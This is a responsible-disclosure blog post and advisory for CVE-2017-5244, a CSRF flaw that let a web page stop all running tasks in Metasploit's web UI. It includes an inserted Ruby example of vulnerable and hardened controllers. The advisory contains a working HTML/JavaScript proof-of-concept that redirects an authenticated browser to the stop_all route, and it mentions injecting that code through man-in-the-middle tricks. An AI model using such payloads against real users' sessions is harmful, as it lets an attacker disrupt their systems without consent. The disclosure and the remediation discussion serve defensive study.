Vulnerability in Metasploit Project aka CVE-2017-5244

 

Hi guys,
I hope you are all doing well. Yes, you read that right: we managed to find a vulnerability in a framework that is used to exploit vulnerabilities! “Today it is me, tomorrow it will be you” 🙂

Today we will talk about a CSRF vulnerability that affects the web application of all three editions of the Metasploit Project that ship a web UI (Express, Community and Pro).

But first, what is Metasploit? (Seriously, maybe somebody out there doesn’t know about it yet :D)

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.

Like comparable commercial products such as Immunity’s Canvas or Core Security Technologies’ Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.

Metasploit’s emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.

 

This CSRF vulnerability can be used to stop every running scan and task in the Metasploit web UI.

When we discovered this issue we called it “the Metasploit firewall”. Funny, isn’t it? But why? If you host a page containing the proof-of-concept code below as the index of your local or public web server, a Metasploit scanning session that crawls that page will be tricked into loading it, which kills all of its running tasks. A firewall? Hmm, kind of!

(Update: we thought this might be a valid attack vector, but after some investigation it turned out not to be, because the crawler used by Metasploit is not authenticated with the Metasploit session itself.)

Usability issue: there should be an option to resume stopped tasks, so that they are not lost entirely after such an attack.

The Metasploit team’s comment on the issue:

CVE-2017-5244 (CWE-352: Cross-Site Request Forgery): Metasploit commercial editions allowed GET requests to the stop and stop_all (task) routes. This should not have been the case, as they change the state of the service, and should have been only allowed through POST requests. In addition, the origin of the requests was not verified until after processing. This could have allowed an attacker to stop one, or all, Metasploit tasks by getting an authenticated user to run JavaScript (e.g. via loading a malicious URL). Now the routes are only exposed to POST requests, which validate the presence of a secret token to prevent CSRF attacks (via Rails’ protect_from_forgery). This vulnerability was kindly reported to Rapid7 by Mohamed A. Baset (Founder and Cyber Security Advisor at Seekurity.com SAS de C.V. Mexico; @SymbianSyMoh).

Rapid7 published a public advisory with more technical details; you can read it here: https://community.rapid7.com/community/metasploit/blog/2017/06/14/r7-2017-16-cve-2017-5244-lack-of-csrf-protection-for-stopping-tasks-in-metasploit-pro-express-and-community-editions-fixed
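The two defects in Rapid7’s description above (a state-changing route reachable by GET, and the forgery check running only after the state has already changed) and the corrected ordering, as an added example in plain Ruby. This is not Rapid7’s or Metasploit’s code: it stands in for the Rails task controller with a few hypothetical classes (TaskService, Request, VulnerableTasksController, HardenedTasksController) and a constructed session token. The route path /tasks/stop_all and the fix (POST only, token verified before anything else, as Rails’ protect_from_forgery does) are the ones from the advisory.

```ruby
# Added example, not Rapid7's or Metasploit's code. Hypothetical stand-ins for
# the Rails controller that served /tasks/stop_all before and after the fix.

# Simulated task store: a running task is just its name here.
class TaskService
  attr_reader :tasks

  def initialize(tasks)
    @tasks = tasks.dup
  end

  # Stops every running task and returns the names that were stopped.
  def stop_all!
    stopped = @tasks.dup
    @tasks.clear
    stopped
  end
end

# Stand-in for a Rack request: HTTP method, path, form params and the
# server-side session (which holds the CSRF secret the UI embeds in its forms).
Request = Struct.new(:http_method, :path, :params, :session)

# Constant-time comparison so token validation does not leak via timing
# (Rails uses ActiveSupport::SecurityUtils.secure_compare for the same purpose).
def secure_compare(a, b)
  return false if a.nil? || b.nil? || a.bytesize != b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Pre-fix behaviour: any HTTP method reaches the route, and the state change
# happens before the forgery check, so a rejected request still does damage.
class VulnerableTasksController
  def initialize(service)
    @service = service
  end

  def call(req)
    return [404, 'not found'] unless req.path == '/tasks/stop_all'
    stopped = @service.stop_all!                       # state changed first
    token_ok = secure_compare(req.params['authenticity_token'], req.session[:csrf_token])
    return [422, 'invalid authenticity token'] unless token_ok   # too late
    [200, "stopped #{stopped.size} task(s)"]
  end
end

# Post-fix behaviour: POST only, and the forgery check runs before the
# controller does anything (the equivalent of a protect_from_forgery before_action).
class HardenedTasksController
  def initialize(service)
    @service = service
  end

  def call(req)
    return [404, 'not found'] unless req.path == '/tasks/stop_all'
    return [405, 'method not allowed'] unless req.http_method == 'POST'
    token_ok = secure_compare(req.params['authenticity_token'], req.session[:csrf_token])
    return [422, 'invalid authenticity token'] unless token_ok
    stopped = @service.stop_all!                       # only after validation
    [200, "stopped #{stopped.size} task(s)"]
  end
end

# Sends one request to a fresh controller and returns [status, tasks_left].
# A cross-site GET carries the victim's session (the browser attaches the
# cookie) but no authenticity_token, which is what the PoC page produces.
def attempt(controller_class, http_method, params = {})
  service = TaskService.new(%w[discovery-scan-1 bruteforce-2])   # constructed sample tasks
  session = { csrf_token: 'S3cr3tToken' }                        # constructed session secret
  req = Request.new(http_method, '/tasks/stop_all', params, session)
  status, _body = controller_class.new(service).call(req)
  [status, service.tasks.size]
end

if __FILE__ == $PROGRAM_NAME
  good = { 'authenticity_token' => 'S3cr3tToken' }
  puts "vulnerable, forged GET:        #{attempt(VulnerableTasksController, 'GET').inspect}"   # [422, 0]
  puts "hardened,   forged GET:        #{attempt(HardenedTasksController, 'GET').inspect}"     # [405, 2]
  puts "hardened,   POST, no token:    #{attempt(HardenedTasksController, 'POST').inspect}"    # [422, 2]
  puts "hardened,   POST, valid token: #{attempt(HardenedTasksController, 'POST', good).inspect}" # [200, 0]
end
```

The vulnerable controller answers the forged GET with 422, yet both tasks are already gone: that is why “origin verified after processing” is no protection at all. The hardened controller rejects the GET with 405 and a token-less POST with 422 without touching the tasks; only a POST carrying the session’s token, which a same-origin form produces and a cross-site page cannot read, stops them.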

And here is our advisory details:

# Exploit Title:

Metasploit Web Project Kill all running tasks CSRF

# Date reported:

27-5-2017

# Exploit Author:

Seekurity SAS de C.V. – Mohamed Abdelbasset Elnouby (@SymbianSyMoh)

# Vendor Homepage:

http://www.metasploit.com/

# Software Link:

https://www.rapid7.com/products/metasploit/download/editions/

# Affected Versions:

Express, Community and Pro < 4.14.0 (Update 2017051801)

# CVE number:

CVE-2017-5244

Vulnerability:

Cross-Site Request Forgery (CSRF) / improper anti-CSRF token validation

Vulnerability reference:

http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Video PoC:

Impact:

After some research, I found that the anti-CSRF token (authenticity_token) is not validated server-side before the request is processed, and that the stop/stop_all task routes also accept GET requests. A cross-site request therefore succeeds and kills all currently running Metasploit tasks (with no ability to resume them).

Attack vectors:

An attacker can target a local Metasploit user and use the PoC code to stop/kill all running Metasploit tasks, or use man-in-the-middle tricks such as injecting the PoC code into the victim’s network traffic, with exactly the same impact.

PoC Code:

<!DOCTYPE html>
<html>
<head>
<title>Metasploit Asset Firewall - Kill all running tasks bug PoC</title>
</head>
<body>
<h1>Metasploit Asset Firewall - Kill all running tasks bug PoC by Mohamed A. Baset - @Seekurity</h1>
<h2 style="color: red">Killing all running metasploit tasks after 5 seconds...</h2>
<script>
// After 5 seconds, navigate the victim's browser to the state-changing GET route.
// The browser attaches the victim's Metasploit session cookie, and the unpatched
// routes accept GET without checking the anti-CSRF token first, so the request
// stops every running task. 3790 is the default port of the Metasploit web UI.
setTimeout(function () {
  window.location.replace("https://127.0.0.1:3790/tasks/stop_all");
}, 5000);
</script>
</body>
</html>

 

Disclosure Timeline

Sat, May 27, 2017:   Vulnerability reported to Rapid7 by Mohamed A. Baset
Tue, May 30, 2017:   Vulnerability confirmed by Rapid7
Fri, June 9, 2017:   Vulnerability fixed by Rapid7
Sun, June 11, 2017:  Rapid7 assigned CVE-2017-5244 to this vulnerability
Wed, June 14, 2017:  Rapid7 released patch; public disclosure
Wed, June 14, 2017:  Rapid7 reported vulnerability to MITRE (planned)

 

Many thanks to Samuel Huckins (Program Manager at Rapid7), who kept us updated in a great and professional way!

 
